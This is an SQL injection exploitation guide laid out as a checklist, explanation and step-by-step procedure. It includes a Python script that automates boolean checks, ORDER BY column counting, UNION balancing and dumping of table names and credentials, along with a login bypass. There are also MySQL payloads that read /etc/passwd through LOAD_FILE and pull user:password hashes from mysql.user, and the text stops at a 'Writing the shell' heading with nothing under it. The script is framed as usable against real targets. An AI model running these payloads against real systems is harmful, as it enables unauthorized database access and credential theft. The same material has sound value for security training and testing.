SQL injection

Checklist

Analyzing vulnerable or not

  1. Try error-based, time-based, union-based and boolean-based payloads, in that order

  2. Try boolean payloads for authentication bypass

Manual data fetch checks

  1. Check the database version

  2. Check the current database name

  3. Check the database user, host and password hash

  4. Use group_concat() to fetch many values through a single reflected column

  5. Use information_schema to enumerate databases, tables and columns

Basic checks

  1. URL-encode, then double-URL-encode the payload

  2. HTML-encode the payload

  3. Close the query with a comment after the payload (-- followed by a space, #, or /**/, depending on the database)

  4. Use AND / OR conditions to get the injected expression evaluated

  5. Enter an invalid (non-existent) value in the parameter

Burp Suite checks

  1. Watch the "file size | page load time" readout in Repeater (response length and response time)

  2. Search the response for "error" before and after injecting the payload

  3. Inject in cookies

  4. If the plain payload does not work, wrap it in brackets: "(payload)"

  5. Inject in

Explanation

Before exploitation, let's understand how the SQL behind a page runs.

http://xyz.com/order?id=1

In this URL the data is fetched by a SQL query driven by the parameter

id=1

To fetch the details of a product, a name, or whatever the page shows, there is a parameter called id whose value is 1, and behind it a query like this runs:

SELECT * FROM <table_name> WHERE ID = 1

Here "*" fetches every column of the given table, and the WHERE condition restricts the rows to the ones matching the id parameter. If the application pastes the value of id straight into that query string, anything we put in the parameter becomes part of the SQL, which is what makes injection possible. Now that we know what runs behind the page, let's move on.

Exploitation

To check whether a parameter is vulnerable to, and exploitable with, SQL injection, there are two stages:

  • CREATING AN ERROR (or any other observable change)

If we can make the database error, or otherwise change its behaviour in a way we can observe, the parameter is injectable. We can do that in five ways:

  1. Logical error: enter a non-existing value in the parameter (the page comes back empty or different)

  2. Error payloads (a visible database error in the response)

  3. Blind / time-based payloads (a delay, e.g. sleep())

  4. Boolean payloads (a true condition and a false condition give different pages)

  5. Union payloads (extra rows appended to the result)

  • FETCHING DATA

  1. UNION SELECT payloads

  2. Boolean payloads (extracting the data one condition at a time when nothing is reflected)

Note: if you don't know the database, table or column names, information_schema is always available (on MySQL, PostgreSQL and MSSQL) and lists all of them.

Steps to reproduce

  1. First make the database error or misbehave. Here I used an error/blind payload: (' or sleep(5)). To check whether the payload worked, watch for changes in the web page, or look at the bottom-right corner of Burp Repeater (file size | time taken to load the page).

  2. Note the (file size | page load time) before and after injecting the payload, e.g. before: (6532 bytes | 497 millis), after: (6234 bytes | 5,578 millis). The extra five seconds is sleep(5) firing, which proves the injected SQL was executed.

  3. Make the page normal again (a non-error page). For that, first count the columns with ORDER BY 1, ORDER BY 2, ORDER BY 3 ... payloads: ORDER BY does not error for a valid column number and errors as soon as a non-existent column number is entered. Then balance the query: the UNION SELECT must supply exactly that number of columns, e.g. UNION SELECT 1,2,3,4,5,6,7. The numbers that now appear on the page (e.g. 5, 2, 3, 4) are the reflected columns, the ones that can carry data out.

  4. From here there are lots of things we can do with the injection: read local files (LFI-style, via LOAD_FILE), upload a shell, write an output file, and fetch the database's usernames and password hashes.
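The whole procedure above, run end to end against a constructed stand-in for the vulnerable page. This is an added example, not code from the original page: an in-memory sqlite3 database replaces MySQL, so sqlite_master plays the part of information_schema and `||` replaces concat(); the orders and users tables, their seven-column layout, the columns the template renders (2 to 5) and the 9999999 dummy id are all assumptions made for the example. It shows the query from the Explanation section built by string concatenation next to the parameterized version, the boolean check, ORDER BY column counting, UNION balancing with marker strings, a group_concat fetch through a reflected column, and the authentication bypass from the checklist.

```python
import re
import sqlite3

# Constructed stand-in for the backend of http://xyz.com/order?id=1 (example
# only). sqlite3 replaces MySQL; the table and column names are made up, and
# the seven-column layout matches the page's "1,2,3,4,5,6,7" payloads.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE orders (id INTEGER, code TEXT, item TEXT, qty INTEGER,
                     price REAL, owner TEXT, note TEXT);
INSERT INTO orders VALUES (1, 'A1', 'laptop', 1, 999.0, 'alice', 'gift');
INSERT INTO orders VALUES (2, 'B2', 'mouse', 3, 19.5, 'bob', '');
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO users VALUES ('admin', 's3cr3t');
""")


def vulnerable_lookup(id_value: str):
    """The query the Explanation section describes, with id concatenated in."""
    return conn.execute(f"SELECT * FROM orders WHERE id = {id_value}").fetchall()


def safe_lookup(id_value: str):
    """The same lookup with a bound parameter: the value never becomes SQL."""
    return conn.execute("SELECT * FROM orders WHERE id = ?", (id_value,)).fetchall()


def page_response(id_value: str):
    """Mimic what Burp shows: (errored?, body). The page template is assumed
    to render only columns 2-5 (item, qty, price, owner), so only those reflect."""
    try:
        rows = vulnerable_lookup(id_value)
    except sqlite3.Error as exc:
        return True, f"Error: {exc}"
    return False, "\n".join(" | ".join(str(v) for v in r[1:5]) for r in rows)


def boolean_differs(param: str) -> bool:
    """Checklist boolean payload: AND 1=1 and AND 1=2 must give different
    pages, and neither may error."""
    t_err, t_body = page_response(f"{param} AND 1=1")
    f_err, f_body = page_response(f"{param} AND 1=2")
    return not t_err and not f_err and len(t_body) != len(f_body)


def count_columns(param: str, limit: int = 50) -> int:
    """Step 3: ORDER BY n works up to the real column count, then errors."""
    n = 1
    while n <= limit and not page_response(f"{param} ORDER BY {n}")[0]:
        n += 1
    return n - 1


def reflected_columns(ncols: int) -> list:
    """Step 3 continued: balance the UNION with marker strings in place of
    1,2,3,... and see which positions show up (the page's '5, 2, 3, 4')."""
    markers = ",".join(f"'col{i}'" for i in range(1, ncols + 1))
    _, body = page_response(f"9999999 UNION SELECT {markers}")
    seen = set(re.findall(r"col\d+", body))
    return [i for i in range(1, ncols + 1) if f"col{i}" in seen]


def fetch(ncols: int, col: int, subquery: str) -> str:
    """Put a scalar subquery into a reflected column, wrapped in [] so it can
    be picked out of the HTML. sqlite concatenates with ||, MySQL with concat()."""
    cells = ["'x'"] * ncols
    cells[col - 1] = f"'['||({subquery})||']'"
    _, body = page_response(f"9999999 UNION SELECT {','.join(cells)}")
    return re.search(r"\[(.*?)\]", body).group(1)


def list_tables(ncols: int, col: int) -> list:
    """Data-fetch check 5: sqlite_master stands in for information_schema."""
    names = fetch(ncols, col,
                  "SELECT group_concat(name) FROM sqlite_master WHERE type='table'")
    return names.split(",")


def vulnerable_login(username: str, password: str):
    """Target for the checklist's 'boolean payloads for authentication bypass'."""
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone()


if __name__ == "__main__":
    print(vulnerable_lookup("1 OR 1=1"))   # both rows come back: injectable
    print(safe_lookup("1 OR 1=1"))         # []: the bound string matches no id
    ncols = count_columns("1")
    cols = reflected_columns(ncols)
    print(ncols, cols)                     # 7 [2, 3, 4, 5]
    print(list_tables(ncols, cols[0]))     # ['orders', 'users']
    print(fetch(ncols, cols[0],
                "SELECT group_concat(username||':'||password) FROM users"))
    print(vulnerable_login("admin'-- ", "wrong"))   # ('admin',): the comment cut off the password check
```

Running the file prints the result of each step. Against a real target the same functions apply unchanged if page_response() is swapped for an HTTP request whose response length and elapsed time play the role of Burp's "file size | page load time" readout.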

LFI (reading a local file with LOAD_FILE)

cod=9999999 UNION SELECT 1,LOAD_FILE('/etc/passwd'),3,4,5,6,7#

LOAD_FILE() only returns the file when the database user has the FILE privilege and the path is allowed by secure_file_priv; otherwise it returns NULL and that column simply shows nothing.

Credentials of the database

Here is the payload. A scalar subquery in a UNION column must return exactly one column and one row, so the values are concatenated and limited:

cod=99999 UNION SELECT 1,(SELECT concat(host,':',user,':',password) FROM mysql.user LIMIT 1),3,4,5,6,7#
or, to get every account in one go:
cod=99999 UNION SELECT 1,group_concat(host,':',user,':',password),3,4,5,6,7 FROM mysql.user#

Reading mysql.user requires a privileged database user, and on MySQL 5.7 and later the hash column is called authentication_string rather than password.

Writing the shell
